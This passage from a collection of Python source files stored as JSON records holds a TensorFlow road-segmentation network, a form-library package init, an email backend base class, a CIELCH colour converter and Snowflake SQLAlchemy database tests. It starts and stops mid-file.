qdata.events.popleft()))\n return\n for queue_id in cdata.queue_ids:\n qdata = self._qdata(queue_id)\n qdata.clients.append(client)\n cdata.active = True\n\n def enqueue(self, queue_id, event):\n \"\"\"Add a new event to a given queue.\n \"\"\"\n qdata = self._qdata(queue_id)\n qdata.events.append(event)\n while len(qdata.clients) > 0:\n client = qdata.clients.popleft()\n cdata = self._cdata(client)\n if not cdata.active:\n continue\n if queue_id not in cdata.queue_ids:\n continue\n cdata.active = False\n client.sendResponse((queue_id, qdata.events.popleft()))\n return\n"} {"ext": "py", "sha": "1a2fd5b5d2ad163433446939e5563b3bda14e61b", "content": "import os.path\nimport tensorflow as tf\nimport helper\nimport warnings\nfrom distutils.version import LooseVersion\nimport project_tests as tests\n\n# Check TensorFlow Version\nassert LooseVersion(tf.__version__) >= LooseVersion(\n '1.0'), 'Please use TensorFlow version 1.0 or newer. You are using {}'.format(tf.__version__)\nprint('TensorFlow Version: {}'.format(tf.__version__))\n\n# Check for a GPU\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found. Please use a GPU to train your neural network.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n \"\"\"\n Load Pretrained VGG Model into TensorFlow.\n :param sess: TensorFlow Session\n :param vgg_path: Path to vgg folder, containing \"variables/\" and \"saved_model.pb\"\n :return: Tuple of Tensors from VGG model (image_input, keep_prob, layer3_out, layer4_out, layer7_out)\n \"\"\"\n # TODO: Implement function\n # Use tf.saved_model.loader.load to load the model and weights\n vgg_tag = 'vgg16'\n vgg_input_tensor_name = 'image_input:0'\n vgg_keep_prob_tensor_name = 'keep_prob:0'\n vgg_layer3_out_tensor_name = 'layer3_out:0'\n vgg_layer4_out_tensor_name = 'layer4_out:0'\n vgg_layer7_out_tensor_name = 'layer7_out:0'\n\n ## pretrain\n tf.saved_model.loader.load(sess, [vgg_tag], vgg_path)\n\n ## extract layers\n graph = tf.get_default_graph()\n image_input = graph.get_tensor_by_name(vgg_input_tensor_name)\n keep_prob = tf.get_default_graph().get_tensor_by_name(vgg_keep_prob_tensor_name)\n layer3_out = tf.get_default_graph().get_tensor_by_name(vgg_layer3_out_tensor_name)\n layer4_out = tf.get_default_graph().get_tensor_by_name(vgg_layer4_out_tensor_name)\n layer7_out = tf.get_default_graph().get_tensor_by_name(vgg_layer7_out_tensor_name)\n\n return image_input, keep_prob, layer3_out, layer4_out, layer7_out\n\n\ntests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n \"\"\"\n Create the layers for a fully convolutional network. Build skip-layers using the vgg layers.\n :param vgg_layer7_out: TF Tensor for VGG Layer 3 output\n :param vgg_layer4_out: TF Tensor for VGG Layer 4 output\n :param vgg_layer3_out: TF Tensor for VGG Layer 7 output\n :param num_classes: Number of classes to classify\n :return: The Tensor for the last layer of output\n \"\"\"\n # TODO: Implement function\n\n # 1x1 convolution of vgg layer 7\n layer7_conv_1x1 = tf.layers.conv2d(vgg_layer7_out, num_classes, 1,\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n # upsample\n layer7_out = tf.layers.conv2d_transpose(layer7_conv_1x1, num_classes, 4,\n strides=(2, 2),\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n # 1x1 convolution of vgg layer 4\n layer4_conv_1x1 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1,\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n layer4_skip_conns = tf.add(layer7_out, layer4_conv_1x1)\n layer4_out = tf.layers.conv2d_transpose(layer4_skip_conns, num_classes, 4,\n strides=(2, 2),\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n # 1x1 convolution of vgg layer 3\n layer3_conv_1x1 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1,\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer3_skip_conns = tf.add(layer4_out, layer3_conv_1x1)\n layer3_out = tf.layers.conv2d_transpose(layer3_skip_conns, num_classes, 16,\n strides=(8, 8),\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n return layer3_out\n\n\ntests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n \"\"\"\n Build the TensorFLow loss and optimizer operations.\n :param nn_last_layer: TF Tensor of the last layer in the neural network\n :param correct_label: TF Placeholder for the correct label image\n :param learning_rate: TF Placeholder for the learning rate\n :param num_classes: Number of classes to classify\n :return: Tuple of (logits, train_op, cross_entropy_loss)\n \"\"\"\n # TODO: Implement function\n\n logits = tf.reshape(nn_last_layer, (-1, num_classes))\n correct_label = tf.reshape(correct_label, (-1, num_classes))\n\n # Loss function\n cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=correct_label))\n\n # Training operation\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n train_op = optimizer.minimize(cross_entropy_loss)\n\n return logits, train_op, cross_entropy_loss\n\n\ntests.test_optimize(optimize)\n\n\ndef train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate):\n \"\"\"\n Train neural network and print out the loss during training.\n :param sess: TF Session\n :param epochs: Number of epochs\n :param batch_size: Batch size\n :param get_batches_fn: Function to get batches of training data. Call using get_batches_fn(batch_size)\n :param train_op: TF Operation to train the neural network\n :param cross_entropy_loss: TF Tensor for the amount of loss\n :param input_image: TF Placeholder for input images\n :param correct_label: TF Placeholder for label images\n :param keep_prob: TF Placeholder for dropout keep probability\n :param learning_rate: TF Placeholder for learning rate\n \"\"\"\n # TODO: Implement function\n sess.run(tf.global_variables_initializer())\n\n print(\"Training Neural Network\\n\\n\")\n for itr in range(epochs):\n print(\"Epoch No. {}\".format(itr + 1))\n for image, label in get_batches_fn(batch_size):\n _, loss = sess.run([train_op, cross_entropy_loss],\n feed_dict={input_image: image, correct_label: label, keep_prob: 0.5,\n learning_rate: 0.0009})\n print(\"Training Loss: {:.3f}\".format(loss))\n print()\n\n\ntests.test_train_nn(train_nn)\n\n\ndef run():\n num_classes = 2\n image_shape = (160, 576)\n data_dir = './data'\n runs_dir = './runs'\n tests.test_for_kitti_dataset(data_dir)\n\n # Download pretrained vgg model\n helper.maybe_download_pretrained_vgg(data_dir)\n\n # OPTIONAL: Train and Inference on the cityscapes dataset instead of the Kitti dataset.\n # You'll need a GPU with at least 10 teraFLOPS to train on.\n # https://www.cityscapes-dataset.com/\n\n with tf.Session() as sess:\n # Path to vgg model\n vgg_path = os.path.join(data_dir, 'vgg')\n # Create function to get batches\n get_batches_fn = helper.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n # OPTIONAL: Augment Images for better results\n # https://datascience.stackexchange.com/questions/5224/how-to-prepare-augment-images-for-neural-network\n\n # Build NN using load_vgg, layers, and optimize function\n\n BATCH_SIZE = 5\n EPOCHS = 50\n\n # Placeholders for Tensorflow\n correct_label = tf.placeholder(tf.int32, [None, None, None, num_classes], name='correct_label')\n learning_rate = tf.placeholder(tf.float32, name='learning_rate')\n\n input_image, keep_prob, layer3_out, layer4_out, layer7_out = load_vgg(sess, vgg_path)\n\n last_layer_out = layers(layer3_out, layer4_out, layer7_out, num_classes)\n\n logits, train_op, cross_entropy_loss = optimize(last_layer_out, correct_label, learning_rate, num_classes)\n\n # Train NN using the train_nn function\n train_nn(sess, EPOCHS, BATCH_SIZE, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate)\n\n # Save inference data using helper.save_inference_samples\n helper.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n # OPTIONAL: Apply the trained model to a video\n\n\nif __name__ == '__main__':\n run()"} {"ext": "py", "sha": "1a2fd60e4d1beee6888ddba7ed6af1def3c7d255", "content": "import logging\nlog = logging.getLogger('onegov.form') # noqa\nlog.addHandler(logging.NullHandler()) # noqa\n\nfrom translationstring import TranslationStringFactory\n_ = TranslationStringFactory('onegov.form') # noqa\n\nfrom onegov.form.collection import (\n FormCollection,\n FormSubmissionCollection,\n FormDefinitionCollection\n)\nfrom onegov.form.core import (\n FieldDependency,\n Form,\n merge_forms,\n move_fields,\n)\nfrom onegov.form.display import render_field\nfrom onegov.form.extensions import FormExtension, Extendable\nfrom onegov.form.integration import FormApp\nfrom onegov.form.models import (\n FormDefinition,\n FormFile,\n FormSubmission,\n FormRegistrationWindow,\n PendingFormSubmission,\n CompleteFormSubmission\n)\nfrom onegov.form.parser import find_field\nfrom onegov.form.parser import flatten_fieldsets\nfrom onegov.form.parser import parse_form\nfrom onegov.form.parser import parse_formcode\nfrom onegov.form.parser import WTFormsClassBuilder\nfrom onegov.form.utils import decimal_range, as_internal_id, with_options\n\n__all__ = [\n 'as_internal_id',\n 'CompleteFormSubmission',\n 'decimal_range',\n 'find_field',\n 'flatten_fieldsets',\n 'Extendable',\n 'FieldDependency',\n 'Form',\n 'FormApp',\n 'FormCollection',\n 'FormDefinition',\n 'FormDefinitionCollection',\n 'FormExtension',\n 'FormFile',\n 'FormRegistrationWindow',\n 'FormSubmission',\n 'FormSubmissionCollection',\n 'merge_forms',\n 'move_fields',\n 'parse_form',\n 'parse_formcode',\n 'PendingFormSubmission',\n 'render_field',\n 'with_options',\n 'WTFormsClassBuilder',\n]\n"} {"ext": "py", "sha": "1a2fd613b9bdb475afb052b7c1456d1191c09bb1", "content": "\"\"\"Base email backend class.\"\"\"\n\nclass BaseEmailBackend(object):\n \"\"\"\n Base class for email backend implementations.\n\n Subclasses must at least overwrite send_messages().\n \"\"\"\n def __init__(self, fail_silently=False, **kwargs):\n self.fail_silently = fail_silently\n\n def open(self, callback=False):\n \"\"\"Open a network connection.\n\n This method can be overwritten by backend implementations to\n open a network connection.\n\n It's up to the backend implementation to track the status of\n a network connection if it's needed by the backend.\n\n This method can be called by applications to force a single\n network connection to be used when sending mails. See the\n send_messages() method of the SMTP backend for a reference\n implementation.\n\n The default implementation does nothing.\n \"\"\"\n pass\n\n def close(self):\n \"\"\"Close a network connection.\"\"\"\n pass\n\n def send_messages(self, email_messages, callback=False):\n \"\"\"\n Sends one or more EmailMessage objects and returns the number of email\n messages sent.\n \"\"\"\n raise NotImplementedError\n"} {"ext": "py", "sha": "1a2fd7440c6a08e2a23e68232183b39370f64bad", "content": "# -*- coding: utf-8 -*-\n#\nimport numpy\n\nfrom . import cielab\nfrom .illuminants import whitepoints_cie1931\n\n\nclass CIELCH(object):\n def __init__(self, whitepoint=whitepoints_cie1931['D65']):\n self.cielab = cielab.CIELAB(whitepoint=whitepoint)\n return\n\n def from_xyz100(self, xyz):\n L, u, v = self.cielab.from_xyz100(xyz)\n C = numpy.hypot(u, v)\n h = numpy.mod(numpy.arctan2(v, u), 2*numpy.pi) / numpy.pi * 180\n return numpy.array([L, C, h])\n\n def to_xyz100(self, lch):\n L, C, h = lch\n h_ = h * numpy.pi / 180\n lab = numpy.array([L, C * numpy.cos(h_), C * numpy.sin(h_)])\n return self.cielab.to_xyz100(lab)\n"} {"ext": "py", "sha": "1a2fd90970a101f64c169389990865b6d19a55bc", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2012-2019 Snowflake Computing Inc. All right reserved.\n#\nimport os\nimport random\nimport re\nimport string\nimport time\n\nimport pytest\nfrom conftest import get_engine\nfrom mock import patch\nfrom parameters import CONNECTION_PARAMETERS\nfrom snowflake.connector import ProgrammingError, connect\nfrom snowflake.sqlalchemy import URL, MergeInto, dialect\nfrom sqlalchemy import (\n REAL,\n Boolean,\n Column,\n DateTime,\n ForeignKey,\n Integer,\n LargeBinary,\n MetaData,\n Numeric,\n Sequence,\n String,\n Table,\n create_engine,\n dialects,\n inspect,\n text,\n)\nfrom sqlalchemy.sql import and_, not_, or_, select\n\ntry:\n from parameters import (CONNECTION_PARAMETERS2)\nexcept ImportError:\n CONNECTION_PARAMETERS2 = CONNECTION_PARAMETERS\n\nTHIS_DIR = os.path.dirname(os.path.realpath(__file__))\n\n\ndef _create_users_addresses_tables(engine_testaccount, metadata, fk=None):\n users = Table('users', metadata,\n Column('id', Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name', String),\n Column('fullname', String),\n )\n\n addresses = Table('addresses', metadata,\n Column('id', Integer, Sequence('address_id_seq'),\n primary_key=True),\n Column('user_id', None,\n ForeignKey('users.id', name=fk)),\n Column('email_address', String, nullable=False)\n )\n metadata.create_all(engine_testaccount)\n return users, addresses\n\n\ndef _create_users_addresses_tables_without_sequence(engine_testaccount,\n metadata):\n users = Table('users', metadata,\n Column('id', Integer, primary_key=True),\n Column('name', String),\n Column('fullname', String),\n )\n\n addresses = Table('addresses', metadata,\n Column('id', Integer, primary_key=True),\n Column('user_id', None, ForeignKey('users.id')),\n Column('email_address', String, nullable=False)\n )\n metadata.create_all(engine_testaccount)\n return users, addresses\n\n\ndef test_connect_args():\n \"\"\"\n Tests connect string\n\n Snowflake connect string supports account name as a replacement of\n host:port\n \"\"\"\n from sqlalchemy import create_engine\n engine = create_engine(\n 'snowflake://{user}:{password}@{account}/{database}/{schema}'.format(\n user=CONNECTION_PARAMETERS2['user'],\n password=CONNECTION_PARAMETERS2['password'],\n account=CONNECTION_PARAMETERS2['account'],\n database=CONNECTION_PARAMETERS2['database'],\n schema=CONNECTION_PARAMETERS2['schema'],\n )\n )\n try:\n results = engine.execute('select current_version()').fetchone()\n assert results is not None\n finally:\n engine.dispose()\n\n engine = create_engine(\n 'snowflake://{user}:{password}@{account}/'.format(\n user=CONNECTION_PARAMETERS2['user'],\n password=CONNECTION_PARAMETERS2['password'],\n account=CONNECTION_PARAMETERS2['account'],\n )\n )\n try:\n results = engine.execute('select current_version()').fetchone()\n assert results is not None\n finally:\n engine.dispose()\n\n engine = create_engine(URL(\n user=CONNECTION_PARAMETERS2['user'],\n password=CONNECTION_PARAMETERS2['password'],\n account=CONNECTION_PARAMETERS2['account'],\n )\n )\n try:\n results = engine.execute('select current_version()').fetchone()\n assert results is not None\n finally:\n engine.dispose()\n\n engine = create_engine(URL(\n user=CONNECTION_PARAMETERS2['user'],\n password=CONNECTION_PARAMETERS2['password'],\n account=CONNECTION_PARAMETERS2['account'],\n warehouse='testwh'\n )\n )\n try:\n results = engine.execute('select current_version()').fetchone()\n assert results is not None\n finally:\n engine.dispose()\n\n\ndef test_simple_sql(engine_testaccount):\n \"\"\"\n Simple SQL by SQLAlchemy\n \"\"\"\n result = engine_testaccount.execute('show databases')\n rows = [row for row in result]\n assert len(rows) >= 0, 'show database results'\n\n\ndef test_create_drop_tables(engine_testaccount):\n \"\"\"\n Creates and Drops tables\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables_without_sequence(\n engine_testaccount, metadata)\n\n try:\n # validate the tables exists\n results = engine_testaccount.execute('desc table users')\n assert len([row for row in results]) > 0, \"users table doesn't exist\"\n\n # validate the tables exists\n results = engine_testaccount.execute('desc table addresses')\n assert len([row for row in results]) > 0, \\\n \"addresses table doesn't exist\"\n finally:\n # drop tables\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\ndef test_insert_tables(engine_testaccount):\n \"\"\"\n Inserts data into tables\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables(\n engine_testaccount, metadata)\n\n conn = engine_testaccount.connect()\n try:\n # inserts data with an implicitly generated id\n ins = users.insert().values(name='jack', fullname='Jack Jones')\n results = engine_testaccount.execute(ins)\n assert results.inserted_primary_key == [1], 'sequence value'\n results.close()\n\n # inserts data with the given id\n ins = users.insert()\n conn.execute(ins, id=2, name='wendy', fullname='Wendy Williams')\n\n # verify the results\n s = select([users])\n results = conn.execute(s)\n assert len([row for row in results]) == 2, \\\n 'number of rows from users table'\n results.close()\n\n # fetchone\n s = select([users]).order_by('id')\n results = conn.execute(s)\n row = results.fetchone()\n results.close()\n assert row[2] == 'Jack Jones', 'user name'\n assert row['fullname'] == 'Jack Jones', \"user name by dict\"\n assert row[users.c.fullname] == 'Jack Jones', \\\n 'user name by Column object'\n\n conn.execute(addresses.insert(), [\n {'user_id': 1, 'email_address': 'jack@yahoo.com'},\n {'user_id': 1, 'email_address': 'jack@msn.com'},\n {'user_id': 2, 'email_address': 'www@www.org'},\n {'user_id': 2, 'email_address': 'wendy@aol.com'},\n ])\n\n # more records\n s = select([addresses])\n results = conn.execute(s)\n assert len([row for row in results]) == 4, \\\n 'number of rows from addresses table'\n results.close()\n\n # select specified column names\n s = select([users.c.name, users.c.fullname]).order_by('name')\n results = conn.execute(s)\n results.fetchone()\n row = results.fetchone()\n assert row['name'] == 'wendy', 'name'\n\n # join\n s = select([users, addresses]).where(users.c.id == addresses.c.user_id)\n results = conn.execute(s)\n results.fetchone()\n results.fetchone()\n results.fetchone()\n row = results.fetchone()\n assert row['email_address'] == 'wendy@aol.com', 'email address'\n\n # Operator\n assert str(users.c.id == addresses.c.user_id) == \\\n 'users.id = addresses.user_id', 'equal operator'\n assert str(users.c.id == 7) == 'users.id = :id_1', \\\n 'equal to a static number'\n assert str(users.c.name == None) # NOQA\n assert str(users.c.id + addresses.c.id) == 'users.id + addresses.id', \\\n 'number + number'\n assert str(users.c.name + users.c.fullname) == \\\n 'users.name || users.fullname', 'str + str'\n\n # Conjunctions\n # example 1\n obj = and_(\n users.c.name.like('j%'),\n users.c.id == addresses.c.user_id,\n or_(\n addresses.c.email_address == 'wendy@aol.com',\n addresses.c.email_address == 'jack@yahoo.com'\n ),\n not_(users.c.id > 5)\n )\n expected_sql = \"\"\"users.name LIKE :name_1\n AND users.id = addresses.user_id\n AND (addresses.email_address = :email_address_1\n OR addresses.email_address = :email_address_2)\n AND users.id <= :id_1\"\"\"\n assert str(obj) == ''.join(expected_sql.split('\\n')), \\\n \"complex condition\"\n\n # example 2\n obj = users.c.name.like('j%') & (users.c.id == addresses.c.user_id) & \\\n (\n (addresses.c.email_address == 'wendy@aol.com') |\n (addresses.c.email_address == 'jack@yahoo.com')\n ) \\\n & ~(users.c.id > 5)\n assert str(obj) == ''.join(expected_sql.split('\\n')), \\\n \"complex condition using python operators\"\n\n # example 3\n s = select([(users.c.fullname +\n \", \" + addresses.c.email_address).\n label('title')]). \\\n where(\n and_(\n users.c.id == addresses.c.user_id,\n users.c.name.between('m', 'z'),\n or_(\n addresses.c.email_address.like('%@aol.com'),\n addresses.c.email_address.like('%@msn.com')\n )\n )\n\n )\n results = engine_testaccount.execute(s).fetchall()\n assert results[0][0] == 'Wendy Williams, wendy@aol.com'\n\n # Aliases\n a1 = addresses.alias()\n a2 = addresses.alias()\n s = select([users]).where(and_(\n users.c.id == a1.c.user_id,\n users.c.id == a2.c.user_id,\n a1.c.email_address == 'jack@msn.com',\n a2.c.email_address == 'jack@yahoo.com'))\n results = engine_testaccount.execute(s).fetchone()\n assert results == (1, 'jack', 'Jack Jones')\n\n # Joins\n assert str(users.join(addresses)) == 'users JOIN addresses ON ' \\\n 'users.id = addresses.user_id'\n assert str(users.join(addresses,\n addresses.c.email_address.like(\n users.c.name + '%'))) == \\\n 'users JOIN addresses ' \\\n 'ON addresses.email_address LIKE users.name || :name_1'\n\n s = select([users.c.fullname]).select_from(\n users.join(addresses,\n addresses.c.email_address.like(users.c.name + '%')))\n results = engine_testaccount.execute(s).fetchall()\n assert results[1] == ('Jack Jones',)\n\n s = select([users.c.fullname]).select_from(users.outerjoin(\n addresses)).order_by(users.c.fullname)\n results = engine_testaccount.execute(s).fetchall()\n assert results[-1] == ('Wendy Williams',)\n finally:\n conn.close()\n # drop tables\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\n@pytest.mark.skip(\"\"\"\nReflection is not implemented yet.\n\"\"\")\ndef test_reflextion(engine_testaccount):\n \"\"\"\n Tests Reflection\n \"\"\"\n engine_testaccount.execute(\"\"\"\nCREATE OR REPLACE TABLE user (\n id Integer primary key,\n name String,\n fullname String\n)\n\"\"\")\n try:\n meta = MetaData()\n user_reflected = Table('user', meta, autoload=True,\n autoload_with=engine_testaccount)\n assert user_reflected.c == ['user.id', 'user.name', 'user.fullname']\n finally:\n engine_testaccount.execute(\"\"\"\nDROP TABLE IF EXISTS user\n\"\"\")\n\n\ndef test_inspect_column(engine_testaccount):\n \"\"\"\n Tests Inspect\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables_without_sequence(\n engine_testaccount,\n metadata)\n try:\n inspector = inspect(engine_testaccount)\n all_table_names = inspector.get_table_names()\n assert 'users' in all_table_names\n assert 'addresses' in all_table_names\n\n columns_in_users = inspector.get_columns('users')\n\n assert columns_in_users[0]['autoincrement'], 'autoincrement'\n assert columns_in_users[0]['default'] is None, 'default'\n assert columns_in_users[0]['name'] == 'id', 'name'\n assert columns_in_users[0]['primary_key'], 'primary key'\n\n assert not columns_in_users[1]['autoincrement'], 'autoincrement'\n assert columns_in_users[1]['default'] is None, 'default'\n assert columns_in_users[1]['name'] == 'name', 'name'\n assert not columns_in_users[1]['primary_key'], 'primary key'\n\n assert not columns_in_users[2]['autoincrement'], 'autoincrement'\n assert columns_in_users[2]['default'] is None, 'default'\n assert columns_in_users[2]['name'] == 'fullname', 'name'\n assert not columns_in_users[2]['primary_key'], 'primary key'\n\n finally:\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\ndef test_get_indexes(engine_testaccount):\n \"\"\"\n Tests get indexes\n\n NOTE: Snowflake doesn't support indexes\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables_without_sequence(\n engine_testaccount,\n metadata)\n try:\n inspector = inspect(engine_testaccount)\n assert inspector.get_indexes(\"users\") == []\n\n finally:\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\ndef test_get_primary_keys(engine_testaccount):\n \"\"\"\n Tests get primary keys\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables_without_sequence(\n engine_testaccount,\n metadata)\n try:\n inspector = inspect(engine_testaccount)\n\n primary_keys = inspector.get_pk_constraint('users')\n assert primary_keys['constrained_columns'] == ['id']\n\n primary_keys = inspector.get_pk_constraint('addresses')\n assert primary_keys['constrained_columns'] == ['id']\n\n finally:\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\ndef test_get_foreign_keys(engine_testaccount):\n \"\"\"\n Tests foreign keys\n \"\"\"\n metadata = MetaData()\n fk_name = 'fk_users_id_from_addresses'\n users, addresses = _create_users_addresses_tables(\n engine_testaccount,\n metadata, fk=fk_name)\n\n try:\n inspector = inspect(engine_testaccount)\n foreign_keys = inspector.get_foreign_keys('addresses')\n assert foreign_keys[0]['name'] == fk_name\n assert foreign_keys[0]['constrained_columns'] == ['user_id']\n finally:\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\ndef test_get_multile_column_primary_key(engine_testaccount):\n \"\"\"\n Tests multicolumn primary key with and without autoincrement\n \"\"\"\n metadata = MetaData()\n mytable = Table('mytable', metadata,\n Column('gid',\n Integer,\n primary_key=True,\n autoincrement=False),\n Column('id',\n Integer,\n primary_key=True,\n autoincrement=True))\n\n metadata.create_all(engine_testaccount)\n try:\n inspector = inspect(engine_testaccount)\n columns_in_mytable = inspector.get_columns('mytable')\n assert not columns_in_mytable[0]['autoincrement'], 'autoincrement'\n assert columns_in_mytable[0]['default'] is None, 'default'\n assert columns_in_mytable[0]['name'] == 'gid', 'name'\n assert columns_in_mytable[0]['primary_key'], 'primary key'\n assert columns_in_mytable[1]['autoincrement'], 'autoincrement'\n assert columns_in_mytable[1]['default'] is None, 'default'\n assert columns_in_mytable[1]['name'] == 'id', 'name'\n assert columns_in_mytable[1]['primary_key'], 'primary key'\n\n primary_keys = inspector.get_pk_constraint('mytable')\n assert primary_keys['constrained_columns'] == ['gid', 'id']\n\n finally:\n mytable.drop(engine_testaccount)\n\n\ndef test_create_table_with_cluster_by(engine_testaccount):\n # Test case for https://github.com/snowflakedb/snowflake-sqlalchemy/pull/14\n metadata = MetaData()\n user = Table('clustered_user', metadata,\n Column('Id', Integer, primary_key=True),\n Column('name', String),\n snowflake_clusterby=['Id', 'name'])\n metadata.create_all(engine_testaccount)\n try:\n inspector = inspect(engine_testaccount)\n columns_in_table = inspector.get_columns('clustered_user')\n assert columns_in_table[0]['name'] == 'Id', 'name'\n finally:\n user.drop(engine_testaccount)\n\n\ndef test_view_names(engine_testaccount):\n \"\"\"\n Tests all views\n \"\"\"\n inspector = inspect(engine_testaccount)\n\n information_schema_views = inspector.get_view_names(\n schema='information_schema')\n assert 'columns' in information_schema_views\n assert 'table_constraints' in information_schema_views\n\n\ndef test_view_definition(engine_testaccount, db_parameters):\n \"\"\"\n Tests view definition\n \"\"\"\n test_table_name = \"test_table_sqlalchemy\"\n test_view_name = \"testview_sqlalchemy\"\n engine_testaccount.execute(\"\"\"\nCREATE OR REPLACE TABLE {0} (\n id INTEGER,\n name STRING\n)\n\"\"\".format(test_table_name))\n sql = \"\"\"\nCREATE OR REPLACE VIEW {0} AS\nSELECT * FROM {1} WHERE id > 10\"\"\".format(\n test_view_name, test_table_name)\n engine_testaccount.execute(text(sql).execution_options(\n autocommit=True))\n try:\n inspector = inspect(engine_testaccount)\n assert inspector.get_view_definition(test_view_name) == sql.strip()\n assert inspector.get_view_definition(test_view_name,\n db_parameters['schema']) == \\\n sql.strip()\n assert inspector.get_view_names() == [test_view_name]\n finally:\n engine_testaccount.execute(text(\n \"DROP TABLE IF EXISTS {0}\".format(test_table_name)))\n engine_testaccount.execute(text(\n \"DROP VIEW IF EXISTS {0}\".format(test_view_name)))\n\n\ndef test_view_comment_reading(engine_testaccount, db_parameters):\n \"\"\"\n Tests reading a comment from a view once it's defined\n \"\"\"\n test_table_name = \"test_table_sqlalchemy\"\n test_view_name = \"testview_sqlalchemy\"\n engine_testaccount.execute(\"\"\"\nCREATE OR REPLACE TABLE {} (\n id INTEGER,\n name STRING\n)\n\"\"\".format(test_table_name))\n sql = \"\"\"\nCREATE OR REPLACE VIEW {} AS\nSELECT * FROM {} WHERE id > 10\"\"\".format(\n test_view_name, test_table_name)\n engine_testaccount.execute(text(sql).execution_options(\n autocommit=True))\n comment_text = \"hello my viewing friends\"\n sql = \"COMMENT ON VIEW {} IS '{}';\".format(\n test_view_name, comment_text)\n engine_testaccount.execute(text(sql).execution_options(\n autocommit=True))\n try:\n inspector = inspect(engine_testaccount)\n # NOTE: sqlalchemy doesn't have a way to get view comments specifically,\n # but the code to get table comments should work for views too\n assert inspector.get_table_comment(test_view_name) == {'text': comment_text}\n assert inspector.get_table_comment(test_table_name) == {'text': None}\n assert str(inspector.get_columns(test_table_name)) == str(inspector.get_columns(test_view_name))\n finally:\n engine_testaccount.execute(text(\n \"DROP TABLE IF EXISTS {0}\".format(test_table_name)))\n engine_testaccount.execute(text(\n \"DROP VIEW IF EXISTS {0}\".format(test_view_name)))\n\n\n@pytest.mark.skip(\"Temp table cannot be viewed for some reason\")\ndef test_get_temp_table_names(engine_testaccount):\n num_of_temp_tables = 2\n temp_table_name = \"temp_table\"\n for idx in range(num_of_temp_tables):\n engine_testaccount.execute(text(\"\"\"\nCREATE TEMPORARY TABLE {0} (col1 integer, col2 string)\n\"\"\".format(temp_table_name + str(idx))).execution_options(\n autocommit=True))\n for row in engine_testaccount.execute(\"SHOW TABLES\"):\n print(row)\n try:\n inspector = inspect(engine_testaccount)\n temp_table_names = inspector.get_temp_table_names()\n assert len(temp_table_names) == num_of_temp_tables\n finally:\n pass\n\n\ndef test_create_table_with_schema(engine_testaccount, db_parameters):\n metadata = MetaData()\n new_schema = db_parameters['schema'] + \"_NEW\"\n engine_testaccount.execute(text(\n \"CREATE OR REPLACE SCHEMA \\\"{0}\\\"\".format(new_schema)))\n Table('users', metadata,\n Column('id', Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name', String),\n Column('fullname', String),\n schema=new_schema\n )\n metadata.create_all(engine_testaccount)\n\n try:\n inspector = inspect(engine_testaccount)\n columns_in_users = inspector.get_columns('users', schema=new_schema)\n assert columns_in_users is not None\n finally:\n metadata.drop_all(engine_testaccount)\n engine_testaccount.execute(\n text(\"DROP SCHEMA IF EXISTS \\\"{0}\\\"\".format(new_schema)))\n\n\n@pytest.mark.skipif(os.getenv(\"SNOWFLAKE_GCP\") is not None, reason=\"PUT and GET is not supported for GCP yet\")\ndef test_copy(engine_testaccount):\n \"\"\"\n COPY must be in a transaction\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables_without_sequence(\n engine_testaccount,\n metadata)\n\n try:\n engine_testaccount.execute(\n \"PUT file://{file_name} @%users\".format(\n file_name=os.path.join(THIS_DIR, \"data\", \"users.txt\")))\n engine_testaccount.execute(\"COPY INTO users\")\n results = engine_testaccount.execute(\"SELECT * FROM USERS\").fetchall()\n assert results is not None and len(results) > 0\n finally:\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\n@pytest.mark.skip(\"\"\"\nNo transaction works yet in the core API. Use orm API or Python Connector\ndirectly if needed at the moment.\nNote Snowflake DB supports DML transaction natively, but we have not figured out\nhow to integrate with SQLAlchemy core API yet.\n\"\"\")\ndef 